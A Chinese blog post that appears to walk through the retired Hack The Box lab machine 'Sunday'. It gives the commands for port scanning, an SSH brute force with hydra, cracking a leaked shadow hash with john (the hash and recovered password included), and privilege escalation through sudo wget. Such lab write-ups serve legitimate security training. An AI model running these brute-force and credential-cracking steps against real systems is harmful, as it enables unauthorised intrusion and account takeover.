• HTB-靶机-Sunday


    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.76

    本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

    执行命令 autorecon 10.10.10.76 -o ./Sunday

    也可以使用官方的方法进行快速的扫描

    masscan -p1-65535 10.10.10.76 --rate=1000 -e tun0 > ports
    ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '
    ' ',' | sed 's/,$//')
    sudo nmap -Pn -sV -sC -p$ports 10.10.10.76

    没发现啥详细信息,再更改参数扫描一把

    sudo nmap -n -vvv -sS -sV -sC --stylesheet https://raw.githubusercontent.com/snovvcrash/snovvcrash.github.io/master/reports/nmap/nmap-bootstrap.xsl -p79,111,22022,47581,48935 10.10.10.76

    根据开放的79端口,确认目标靶机含有用户sunny,又发现有开放ssh端口,直接进行爆破看看

    hydra -f -l sunny -P sunnypass.lst -s 22022 10.10.10.76 ssh

    密码是根据用户名组合出来的字典

     直接ssh登录

    sshpass -p 'sunday' ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oStrictHostKeyChecking=no -p 22022 sunny@10.10.10.76

    在sunny家目录执行sudo -l发现测试的执行文件,但是不能提权,只好遍历下系统中的文件,发现一个备份文件

     发现含有shadow备份文件,且当前用户可以查看/etc/passwd文件,那么可以通过获取hash进行破解密码

    破解用户sammy的hash密码
    echo 'sammy:x:101:10:sammy:/export/home/sammy:/bin/bash' >sammypasswd
    echo 'sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::' >sammy_shadow
    unshadow sammypasswd sammyshadow > sammyhash
    john sammyhash --wordlist=/usr/share/wordlists/rockyou.txt --format=sha256crypt
    john sammyhash --show
    sammy:cooldude!:101:10:sammy:/export/home/sammy:/bin/bash

    得到密码之后就可以读取user.txt内容,然后执行sudo -l发现可以通过wget的-i参数读取root权限的文件

    至此拿到目标的两个flag.txt

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    Redis提供的持久化机制(RDB和AOF)
    linux创建子进程--fork()方法
    数据库-锁的实践
    nginx中,$request_uri和$uri的区别
    journal size
    目的:将两个三T的硬盘做成LVM(sdc,sdd)
    安装 rbbitMQ redis mongo的三个扩展
    MySQL server has gone away
    mysql创建utf-8字符集数据库
    Linux下杀毒软件clamav的安装和使用
  • 原文地址:https://www.cnblogs.com/autopwn/p/14595840.html
Copyright © 2020-2023  润新知